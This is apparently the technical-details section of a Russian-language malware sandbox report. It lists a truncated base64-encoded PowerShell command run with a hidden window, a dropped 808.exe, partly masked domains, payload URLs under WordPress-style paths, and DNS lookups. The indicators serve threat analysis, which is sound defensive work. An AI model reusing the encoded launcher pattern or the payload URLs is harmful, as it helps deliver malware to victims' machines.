Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -nop -e JABMADIATQB3AEIANABaAD0AJwBGADYAYwBjAHUAWAA4ACcAOwAkAHIANwBuAF8AWQBuACAAPQAgACcAOAAwADgAJwA7ACQAUABLADcAQgBrAHAAPQAnAHEAUgBwAHcAQQBIAGgASQAnADsAJABVAGIAbQBGAEoAWgA9ACQAZQBuAHYAOgB1AHMAZ...
- %HOMEPATH%\808.exe
- %HOMEPATH%\808.exe
- 'th###new.com':80
- 'he###ria.com':80
- 'he###ria.com':443
- 'ce###moroy.com':80
- 'ce###moroy.com':443
- 'fq###pers.com':80
- 'my####ycoins.com':443
- http://www.th###new.com/wp-includes/h8/
- http://he###ria.com/wp-includes/h8/
- http://ce###moroy.com/imagen_OLD/dg38/
- http://fq###pers.com/sitemaps/f5q65143/
- 'he###ria.com':443
- 'ce###moroy.com':443
- 'my####ycoins.com':443
- DNS ASK th###new.com
- DNS ASK he###ria.com
- DNS ASK c-###homes.com
- DNS ASK ce###moroy.com
- DNS ASK fq###pers.com
- DNS ASK my####ycoins.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -nop -e JABMADIATQB3AEIANABaAD0AJwBGADYAYwBjAHUAWAA4ACcAOwAkAHIANwBuAF8AWQBuACAAPQAgACcAOAAwADgAJwA7ACQAUABLADcAQgBrAHAAPQAnAHEAUgBwAHcAQQBIAGgASQAnADsAJABVAGIAbQBGAEoAWgA9ACQAZQBuAHYAOgB1AHMAZ... (со скрытым окном)